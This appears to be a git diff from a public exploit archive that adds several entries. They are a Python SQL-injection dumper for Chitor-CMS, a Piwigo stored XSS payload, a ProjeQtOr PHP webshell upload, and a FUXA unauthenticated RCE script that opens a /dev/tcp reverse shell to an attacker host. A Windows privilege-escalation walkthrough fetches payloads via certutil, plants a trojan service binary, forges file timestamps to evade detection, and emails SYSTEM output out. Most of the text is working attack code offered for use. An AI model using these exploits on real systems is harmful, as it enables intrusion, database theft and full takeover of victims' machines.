_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
ntp:x:104:110::/nonexistent:/usr/sbin/nologin
messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
vboxadd:x:998:1::/var/run/vboxadd:/bin/false
openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
### References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
https://nvd.nist.gov/vuln/detail/CVE-2023-27179
https://www.exploit-db.com/papers/12883

164
exploits/php/webapps/51383.py Executable file
View file

@ -0,0 +1,164 @@
#!/usr/bin/python3
#######################################################
# #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
# Date: 2023/04/13 #
# ExploitAuthor: msd0pe #
# Project: https://github.com/waqaskanju/Chitor-CMS #
# My Github: https://github.com/msd0pe-1 #
# Patched the 2023/04/16: 69d3442 commit #
# #
#######################################################
__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'
class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
OCRA = '\033[93m'
RED = '\033[91m'
CYAN = '\033[96m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class infos:
INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
import re
import requests
import optparse
from prettytable import PrettyTable
def DumpTable(url, database, table):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
columns = []
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
columns.append(i)
pass
except:
pass
x.field_names = columns
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
x.add_rows([i])
except ValueError:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
i.append("")
x.add_rows([i])
print(x)
def ListTables(url, database):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["TABLES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def ListDatabases(url):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["DATABASES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def Main():
Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
(options, args) = Menu.parse_args()
Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
Menu.add_option_group(Examples)
if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
Menu.print_help()
print('')
print(' %s' % __description__)
print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
print(' Any malicious or illegal activity may be punishable by law')
print(' Use at your own risk')
elif len(args) == 0:
try:
if options.url != None:
if options.l_databases != None:
ListDatabases(options.url)
if options.database != None:
if options.l_tables != None:
ListTables(options.url, options.database)
if options.table != None:
if options.dump != None:
DumpTable(options.url, options.database, options.table)
except:
print("Unexpected error")
if __name__ == '__main__':
try:
Main()
except KeyboardInterrupt:
print()
print(infos.PROCESS + "Exiting...")
print()
exit(1)

43
exploits/php/webapps/51386.txt Normal file
View file

@ -0,0 +1,43 @@
Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Application: Piwigo
Version: 13.6.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://piwigo.org/
Software Link: https://piwigo.org/get-piwigo
Date of found: 18.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)
payload: <img%20src=x%20onerror=alert(4)>
POST /piwigo/admin.php?page=photo-9 HTTP/1.1
Host: localhost
Content-Length: 159
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/piwigo/admin.php?page=photo-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
Connection: close
name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings

89
exploits/php/webapps/51387.txt Normal file
View file

@ -0,0 +1,89 @@
Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE)
Application: ProjeQtOr Project Management System
Version: 10.3.2
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
Date of found: 19.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again
Payload:<?php echo system("id"); ?>
poc request:
POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
Host: localhost
Content-Length: 1177
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
Connection: close
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
Content-Type: application/octet-stream
<?php echo system("id"); ?>
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentId"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefType"
User
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefId"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentType"
file
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentLink"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentDescription"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentPrivacy"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="uploadType"
html5
------WebKitFormBoundaryY0bpJaQzcvQberWR--
visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar

45
exploits/typescript/webapps/51385.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186 (current)
from argparse import RawTextHelpFormatter
import argparse, sys, threading, requests
def main(rhost, rport, lhost, lport):
url = "http://"+rhost+":"+rport+"/api/runscript"
payload = {
"headers":
{
"normalizedNames":{},
"lazyUpdate": "null"
},
"params":{
"script":{
"parameters":[
{
"name":"ok",
"type":"tagid",
"value":""
}
],
"mode":"",
"id":"",
"test":"true",
"name":"ok",
"outputId":"",
"code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)
}
}
}
response = requests.post(url, json=payload)
args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')
args=parser.parse_args()
main(args.rhost, args.rport, args.lhost, args.lport)

38
exploits/windows/local/51375.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
# Date: 2023-04-13
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: http://www.diasoft.net - https://www.filereplicationpro.com
# Software Link: http://www.filereplicationpro.com/install/InstData/Windows_64_Bit/VM/frpro.exe
# Version: 7.5.0
# Tested on: Windows 10 Pro 22H2 x64
# CVE: CVE-2023-26918
Incorrect file/folder permissions in Diasoft Corporation's File Replication Pro 7.5.0 allow privilege escalation by
replacing a file with another one that will be executed with "LocalSystem" rights from Windows Services application.
C:\Program Files>icacls "c:\Program Files\FileReplicationPro"
c:\Program Files\FileReplicationPro Everyone:(F)
Everyone:(OI)(CI)(IO)(F)
C:\Users\Administrator>sc qc frp
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: frp
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : "C:\Program Files\FileReplicationPro\prunsrv.exe" //RS//frp
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : FRPReplicationServer
DIPENDENZE : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
To exploit the vulnerability a malicious actor/process must weaponize or replace the prunsrv.exe executable that runs
with LocalSystem privileges as "frp" (FRPReplicationServer) service, since the application's path has "Everyone" full
access permissions.
Moreover, the "properties.xml" file in the "etc" folder inside program's path contains the hashed password for remote
access stored in sha1(base64) value, that is possible to modify. Replacing it with a new hash, generated by encrypting
a string in SHA-1 and encoding its digest via base64, will grant the login access on the application's web interface.

372
exploits/windows/local/51380.txt Normal file
View file

@ -0,0 +1,372 @@
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################
# ==================================================================================================================
[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# ==================================================================================================================
* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
* Now we know that AspEmail service is active.
# ==================================================================================================================
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe" /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
# ================================================================================================================== #
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in linux language.
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
# ==================================================================================================================
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.
# ==================================================================================================================
* Now we will modify the EmailAgent file and inject a self-written malware.
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.
# ==================================================================================================================
* Now we check for my malware ownership.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
# =================================================================================================================#
# #
####################################################################################################################
# #[EmailAgent.cs]# #
####################################################################################################################
# #
#
* We program this malware in such a way that when the server is reboot(when the services are restarted), #
* It will be triggered and execute the codes we want, #
* And then send a printout of all this to the email address we specified. #
#
using System; #
using System.Linq; #
using System.Text; #
using System.Diagnostics; #
using System.IO; #
using System.Collections; #
#
Namespace CliToolSpace #
{ #
class _Main #
{ #
static void Main(string[] args) #
{ #
Cli commandLine = new Cli(); #
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
commandLine.Execute(); #
commandLine.ToFile(@"C:\Windows\Temp\"); #
} #
} #
} #
#
# #
####################################################################################################################
# #[Mail.cs]# #
####################################################################################################################
# #
#
using System; #
using System.Net.Mail; #
using System.Net; #
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #
var mail = new MailMessage(); #
mail.From = new MailAddress("mail@deepseclab.com"); #
mail.To.Add("mail@hacker.com"); #
mail.Subject = "Trigger Successful!"; #
mail.IsBodyHtml = true; #
string htmlBody; #
htmlBody = "<strong>This server has been rebooted.</strong>"; #
mail.Body = htmlBody; #
Attachment attachment; #
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #
mail.Attachments.Add(attachment); #
SmtpServer.Port = 587; #
SmtpServer.UseDefaultCredentials = false; #
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #
SmtpServer.EnableSsl = true; #
SmtpServer.Timeout = int.MaxValue; #
SmtpServer.Send(mail); #
#
# #
####################################################################################################################
# #[Run.bat]# #
####################################################################################################################
# #
#
whoami > C:\Windows\Temp\Export.txt #
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
cd c:\Windows\Tasks #
del Run.bat & del Mail.exe #
#
# #
####################################################################################################################
# #
[+]Trigger Successful![+] #
#
[+] C:\PenTest>systeminfo | findstr "Boot Time" #
System Boot Time: 13.04.2022, 07:46:06 #
#
# #
####################################################################################################################
#[Export.txt]# #
####################################################################################################################
# #
#
NT AUTHORITY\SYSTEM #
#
# #
####################################################################################################################
# #
# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
# =================================================================================================================#
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
# ==================================================================================================================
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
# ==================================================================================================================
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
# ==================================================================================================================

16
files_exploits.csv
View file

@ -3592,6 +3592,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info 38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info
